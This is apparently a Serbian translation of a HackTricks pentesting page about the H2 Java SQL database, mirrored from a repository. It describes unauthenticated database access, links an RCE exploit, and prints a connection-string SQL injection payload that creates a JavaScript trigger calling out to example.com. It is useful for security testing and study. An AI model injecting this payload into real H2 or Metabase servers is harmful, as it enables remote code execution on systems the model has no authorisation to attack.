Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-27 07:01:09 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/pentesting-web/h2-java-sql-database.md
Translator workflow 6c06826974 Translated to Serbian
2024-02-10 13:11:20 +00:00

3.6 KiB
Raw Blame History

H2 - Java SQL baza podataka

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Zvanična stranica: https://www.h2database.com/html/main.html

Pristup

Možete navesti neimenovanu bazu podataka kako biste kreirali novu bazu podataka bez validnih akreditacija (neautentifikovano):

Ili ako znate da je na primer pokrenut mysql i znate ime baze podataka i akreditacije za tu bazu podataka, možete jednostavno pristupiti:

Triks iz Hawk kutije HTB-a.

RCE

Imajući pristup komunikaciji sa H2 bazom podataka, proverite ovaj eksploit za dobijanje RCE-a na njoj: https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed

H2 SQL Injection do RCE

U ovom postu je objašnjen payload za dobijanje RCE putem H2 baze podataka zloupotrebom SQL Injection-a.

[...]
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('https://example.com/pwn134').openConnection().getContentLength()\n$$--=x\\;",
"advanced-options": false,
"ssl": true
},
[...]
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u: